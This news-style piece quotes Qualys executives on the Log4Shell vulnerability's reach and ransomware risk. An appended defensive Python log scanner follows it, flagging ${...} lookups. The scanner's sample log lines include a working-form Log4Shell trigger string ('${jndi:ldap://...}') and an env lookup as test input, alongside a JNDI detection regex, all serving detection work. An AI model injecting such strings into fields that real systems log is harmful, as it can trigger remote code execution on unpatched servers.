The novel security vulnerability Log4Shell keeps security managers in suspense and will continue to endanger IT security in companies. The full current and future extent of the vulnerability is not yet foreseeable.
“Due to the fact that Log4Shell is so basic and ubiquitous, the severity and attack surface that the vulnerability provides is unsurpassed,” says Travis Smith, Director of Malware Threat Research at Qualys. “If young people decide to pursue a career in the field of cyber security, they will still be dealing with this vulnerability fifteen years from now.
It is a remote code execution (RCE) vulnerability. It will bring great success to sophisticated attackers like Conti, as it allows lateral movement, reconnaissance efforts and, ultimately, the spread of ransomware. In addition, Log4Shell occurs at a time when employees are desperately trying to work through their inboxes before the holidays. Since the latest version allows exploitation via local systems, human error is an important attack vector. Companies must therefore secure themselves beyond their borders – or rather: within their borders – in order to protect their data.
This vulnerability is obviously new for defenders, but also new for malicious actors. The better it is understood, the more it will be used for malware and especially for ransomware attacks. The exploitation of this vulnerability will develop in a new way, with industries such as manufacturing, where it is difficult to patch, becoming a popular target for attack. Log4Shell ultimately becomes an important point of attack for malicious actors who are targeting critical infrastructures.”
Mehul Revankar, VP of VMDR (Vulnerability Management, Detection, and Response) at Qualys says: “SolarWinds, Colonial Pipeline, MSFT Exchange and now Log4Shell… there is always talk that these events are a ‘wake-up call’. But all we have done so far has been to press the snooze button. However, Log4Shell offers an unprecedented scale and, due to the fact that the vulnerability is not easy to find, it is for me the riskiest vulnerability that I have seen in my two decades of tenure in the field of cybersecurity.
A good practice of cyber security is to push for more logging. In this case, however, the more you log, the more vulnerable you are. We have a global Fortune 50 manufacturing company whose CISO has given the order to completely take all servers off the grid if the Log4Shell vulnerabilities are not fixed within a few days. Log4Shell is so serious that companies refuse to put systems online until they know that this threat has been eliminated. In addition, there is concern that employees will also fall victim to human exploitation attempts.”
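The point above, that more logging means more exposure, follows from how Log4Shell is triggered: the vulnerable Log4j versions evaluate `${...}` lookup expressions found in logged text, so any attacker-controlled string that reaches a log call is a potential trigger. As an added example, not code from the article or from Qualys, here is a small Python triage scanner for ingested log text: it extracts balanced `${...}` lookup expressions (nested ones included) and rates a direct `${jndi:` lookup as high severity and any other lookup as medium, so defenders can see which logged fields are carrying lookup syntax at all. The sample log lines, field layout and the `203.0.113.5` address are constructed for the example.

```python
import re
from dataclasses import dataclass

# Opening token of a Log4j-style lookup expression.
LOOKUP_OPEN = "${"

# Direct JNDI lookup: the expression form Log4Shell exploitation relies on.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log lines (not from the article). The quoted user-agent
# and the user= field stand in for any attacker-controlled value an app logs.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://203.0.113.5/a}"',
    "user=alice action=login status=ok",
    "user=${env:HOME} action=login status=fail",
]


@dataclass
class Finding:
    line_no: int
    severity: str  # "high" for a JNDI lookup, "medium" for any other lookup
    snippet: str   # the lookup expression as it appeared in the log line


def find_lookups(text: str) -> list:
    """Return every outermost, brace-balanced ${...} expression in text.

    An unterminated "${" is still reported (as the remainder of the line),
    because a truncated log field should not hide a lookup from triage.
    """
    found = []
    i = 0
    while True:
        start = text.find(LOOKUP_OPEN, i)
        if start == -1:
            return found
        depth = 0
        j = start
        while j < len(text):
            if text.startswith(LOOKUP_OPEN, j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    found.append(text[start:j + 1])
                    break
            j += 1
        else:
            found.append(text[start:])
            return found
        i = j + 1


def scan_log(lines) -> list:
    """Scan an iterable of log lines and return one Finding per lookup seen."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for expr in find_lookups(line):
            severity = "high" if JNDI_RE.search(expr) else "medium"
            findings.append(Finding(line_no, severity, expr))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: {f.severity:6} {f.snippet}")
```

The generic rule (any `${...}` in a user-controlled field is worth a look) matters more than the `jndi` keyword match: lookup syntax has no business in a user-agent or username, so its mere presence is the signal, and the severity label only orders the queue. This is a triage aid for log pipelines and does not replace upgrading Log4j.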